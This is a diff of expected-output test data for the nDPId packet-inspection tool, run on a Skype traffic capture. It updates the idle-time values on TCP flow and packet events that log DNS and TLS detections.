@@ -933,23 +933,23 @@ 00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431969719110,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1431969719110,"pkt":"PBXCt3IO0NQSxnP1CABFAAB3AABAAEARtwLAqAEBwKgBIgA18\/YAY7LlbrSBgAABAAIAAAAAE3AwNS1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQZha2FkbnMDbmV0AAABAAHADAABAAEAAAAZAAQRrGQkwAwAAQABAAAAGQAEEaxkCA=="} 00816{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.172.100.36"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719110,"flow_last_seen":1431969719110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431969719110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719110,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHqNAAEAG5HrAqAEiEaxkJMPQAbsLGQpgAAAAALAC\/\/8xEQAAAgQFtAEDAwUBAQgKPiO1KQAAAAAEAgAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431969719259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1431969719259,"pkt":"PBXCt3IO0NQSxnP1CABFAAAsDItAAPAGRqYRrGQkwKgBIgG7w9AFbnZwCxkKYWASH\/7prQAAAgQFoAAA"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431969719259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719259,"pkt":"0NQSxnP1PBXCt3IOCABFAAAocytAAEAGkArAqAEiEaxkJMPQAbsLGQphBW52cVAQ\/\/8hVQAA"} -00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719561,"flow_last_seen":1431969719561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719561,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431969719561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719561,"pkt":"0NQSxnP1PBXCt3IOCABFAABAR+5AAEAG+sPAqAEiW77afcPRMD4OYtZAAAAAALAC\/\/9xPAAAAgQFtAEDAwUBAQgKPiO25AAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2177,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431969719623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969719623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0Hj5AAPQGcH9bvtp9wKgBIjA+w9E3PWT9DmLWQYASH\/7iJQAAAgQFoAEDAwQBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431969719623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719623,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo4VtAAEAGYW7AqAEiW77afcPRMD4OYtZBNz1k\/lAQIAAi3wAA"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719110,"flow_last_seen":1431969719110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431969719110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719110,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHqNAAEAG5HrAqAEiEaxkJMPQAbsLGQpgAAAAALAC\/\/8xEQAAAgQFtAEDAwUBAQgKPiO1KQAAAAAEAgAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431969719259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1431969719259,"pkt":"PBXCt3IO0NQSxnP1CABFAAAsDItAAPAGRqYRrGQkwKgBIgG7w9AFbnZwCxkKYWASH\/7prQAAAgQFoAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431969719259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719259,"pkt":"0NQSxnP1PBXCt3IOCABFAAAocytAAEAGkArAqAEiEaxkJMPQAbsLGQphBW52cVAQ\/\/8hVQAA"} 
+00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719561,"flow_last_seen":1431969719561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719561,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431969719561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719561,"pkt":"0NQSxnP1PBXCt3IOCABFAABAR+5AAEAG+sPAqAEiW77afcPRMD4OYtZAAAAAALAC\/\/9xPAAAAgQFtAEDAwUBAQgKPiO25AAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2177,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431969719623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969719623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0Hj5AAPQGcH9bvtp9wKgBIjA+w9E3PWT9DmLWQYASH\/7iJQAAAgQFoAEDAwQBAQQC"} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431969719623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719623,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo4VtAAEAGYW7AqAEiW77afcPRMD4OYtZBNz1k\/lAQIAAi3wAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABKnloAAEARWNXAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 
00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABK65gAAEARC5fAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2241,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969716015,"flow_last_seen":1431969721054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431969721054,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2241,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969716015,"flow_last_seen":1431969721054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431969721054,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2273,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKt0gAAEARP+fAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKslEAAEARRN7AqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -960,12 +960,12 @@ 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK1+UAAEARH0rAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK050AAEARI5LAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969722958,"flow_last_seen":1431969722958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969722958,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431969722958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969722958,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMbpAAEAGam7AqAEi1KEIJMPSNFCRDXDAAAAAALAC\/\/+cTwAAAgQFtAEDAwUBAQgKPiPECQAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969722958,"flow_last_seen":1431969722958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969722958,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431969722958,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969722958,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMbpAAEAGam7AqAEi1KEIJMPSNFCRDXDAAAAAALAC\/\/+cTwAAAgQFtAEDAwUBAQgKPiPECQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1431969723014,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969723014,"pkt":"0NQSxnP1PBXCt3IOCABFAABAmT0AAEARXfzAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1431969723014,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969723014,"pkt":"0NQSxnP1PBXCt3IOCABFAABAj1YAAEARZ+PAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 